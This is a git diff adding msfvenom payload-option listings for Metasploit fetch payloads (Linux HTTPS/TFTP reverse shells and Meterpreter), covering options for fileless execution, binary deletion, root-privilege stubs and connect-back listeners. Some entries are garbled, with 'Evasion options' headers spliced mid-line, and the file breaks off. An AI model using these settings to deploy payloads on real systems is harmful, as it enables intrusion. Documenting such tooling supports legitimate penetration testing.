detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_port.txt new file mode 100644 index 0000000..51eaec3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_port.txt @@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/https/x86/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 39746 no The local client port +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zSFopvMBg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_find_tag.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_tag.txt new file mode 100644 index 0000000..c894d47 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_find_tag.txt @@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Tag Inline + Module: payload/cmd/linux/https/x86/shell_find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME bQxLcpjD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG vCwJ yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..6994274 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp.txt @@ -0,0 +1,94 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/x86/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SixWyJEAeMp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..7e2e00e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_reverse_tcp_ipv6.txt @@ -0,0 +1,92 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6 + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Matteo Malvica + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SiQfKQjTuo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..b809c57 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter-reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Norma +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp: +========================= + +ic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME POgSWdCh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..8cfc2f5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KfxKdpfRC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..4899e29 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JckjTuNSvWVH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from 